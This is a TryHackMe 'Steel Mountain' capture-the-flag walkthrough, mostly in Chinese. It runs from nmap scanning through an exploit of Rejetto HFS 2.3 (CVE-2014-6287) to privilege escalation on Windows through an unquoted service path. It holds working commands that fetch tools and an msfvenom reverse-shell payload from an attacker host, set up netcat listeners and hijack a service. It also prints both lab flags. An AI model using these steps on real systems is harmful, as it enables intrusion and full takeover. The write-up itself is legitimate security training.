URL : https://tryhackme.com/room/steelmountain
IP : 10.10.27.172
Scan
rustscan -a 10.10.27.172
nmap -A 10.10.27.172
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 01:58 EDT
Nmap scan report for 10.10.27.172
Host is up (0.27s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2021-08-04T05:45:04
|_Not valid after: 2022-02-03T05:45:04
|_ssl-date: 2021-08-05T05:59:31+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open unknown
49156/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:5d:12:51:16:37 (unknown)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-05T05:59:18
|_ start_date: 2021-08-05T05:44:25
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.76 seconds- 觀察首頁
- http://10.10.27.172/
- 有一個 Employee of the month
- 圖片網址 http://10.10.27.172/img/BillHarper.png
- Who is the employee of the month?
Bill Harper
- Scan the machine with nmap. What is the other port running a web server on?
- 8080
- Take a look at the other web server. What file server is running?
- 透過 NMAP 可以發現 HttpFileServer
- 公司叫做 rejetto
- 所以答案
Rejetto Http File Server
- HFS 的版本
2.3可以找到有一個CVE- https://www.exploit-db.com/exploits/39161
CVE-2014-6287
Exploit
- 下載檔案到 kali
wget https://www.exploit-db.com/download/39161 -O 39161.py- 修改內部的 ip 及 port
ip_addr = "10.13.21.55"local_port = "7878"- 這邊的 port 是指 reverse shell 的port
- 另外依照 exploit 需求,需要在攻擊機 80 port 開一個 webserver,並在根目錄放一個
nc.exenc.exe可以從這邊取得- https://github.com/int0x33/nc.exe/blob/master/nc.exe
sudo python3 -m http.server 80- 使用 python 開啟 80 port 的 webserver
- 並於本地端開啟 nc 監聽
nc -l 7877
- 執行 exploit
python 39161.py 10.10.27.172 8080
- 就可以收到 shell ㄌ!
- 使用
whoami確認使用者名稱 - 在使用者的桌面找到 user flag
b04763b6fcf51fcd7c13abc7db4fd365
觀察提權資訊
- 輸入
systeminfo可以觀察到Microsoft Windows Server 2012 R2 Datacenter
- 下載 WinPeas.exe 進行掃描
powershell -c wget http://10.13.21.55:8000/winPEASx64.exe -outFile winPEASx64.exe
- 執行 Winpeas 發現有可疑ㄉ引號路徑漏洞
- 觀察 Services
- 可以輸入
powershell -c Get-Service觀察目前的所有 Services - WinPeas 也已經很好心的告訴我們是
AdvancedSystemCareService9了
- 可以輸入
- 確認檔案與 Services 的權限
- 先準備 https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk 在攻擊機
powershell -c wget http://10.13.21.55:8000/accesschk.exe -outFile accesschk.exe
- 觀察 Services 權限
accesschk.exe /accepteula -ucqv AdvancedSystemCareService9
- 可以發現我們的使用者 bill
- 可以幫 services
StartStop
- 觀察檔案權限
accesschk -uwdq "C:\Program Files (x86)\"- 可以看到我們沒有權限
accesschk -uwdq "C:\Program Files (x86)\IoBit
- 發現我們有 RW 權限!!
- 透過 msfevon 產出一個 reverse shell
msfevon -p windows/x64_shell_reverse_tcp LHOST=10.13.21.55 LPORT=8877 -f exe -a Advanced.exe- 下載檔案並放置到
C:\Program Files (x86)powershell -c wget http://10.13.21.55:8000/Advanced.exe -outFile Advanced.exe
- 準備 reverse shell 監聽
nc -vlk 8877
- 觀察 services
sc qc AdvancedSystemCareService9- qc : Query system config
- 停止 services
sc stop AdvancedSystemCareService9
- 重啟 services
sc start AdvancedSystemCareService9
- 會發現畫面卡住,因為我們的 reverse sehll 已經接上了!!
- 取得 root flag
9af5f314f57607c00fd09803a587db80
